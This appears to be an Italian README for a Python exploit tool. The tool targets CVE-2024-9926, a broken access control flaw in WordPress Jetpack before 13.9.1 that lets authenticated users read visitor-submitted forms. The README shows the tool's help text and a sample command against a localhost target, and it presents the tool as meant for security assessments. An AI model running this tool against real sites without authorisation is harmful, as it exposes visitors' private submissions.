
Exploit Python per Jetpack < 13.9.1 controllo di accesso non corretto (CVE-2024-9926). Consente agli utenti autenticati di leggere i moduli inviati dai visitatori sui siti WordPress. Pensato per valutazioni di sicurezza.
Questo è un programma Python3 che sfrutta la vulnerabilità di controllo degli accessi non corretto (broken access control) di Jetpack < 13.9.1 (CVE-2024-9926).
Questo strumento è destinato a ingegneri della sicurezza e professionisti AppSec per valutazioni di sicurezza. Si prega di utilizzare questo strumento in modo responsabile. Non mi assumo la responsabilità per l'uso che chiunque fa di questa applicazione. NON sono responsabile per eventuali danni causati o crimini commessi utilizzando questo strumento.
$ ./exploit.py --help
usage: exploit.py [-h] -t TARGET -u USERNAME -ap APPLICATION_PASSWORD [-v]
Exploit for Jetpack < 13.9.1 broken access control vulnerability. - v1.0 (2024-11-01)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL of the target WordPress
-u USERNAME, --username USERNAME
Username of WordPress
-ap APPLICATION_PASSWORD, --application-password APPLICATION_PASSWORD
Application Password generated for the user (it's NOT the user password)
-v, --verbose verbose mode
./exploit.py -t https://localhost:1337 -u attacker -ap "AAAA 1111 bbbb 2222 CCCC 3333"
Un'applicazione vulnerabile può essere configurata utilizzando questo repository.
Vedi il file LICENSE per i dettagli.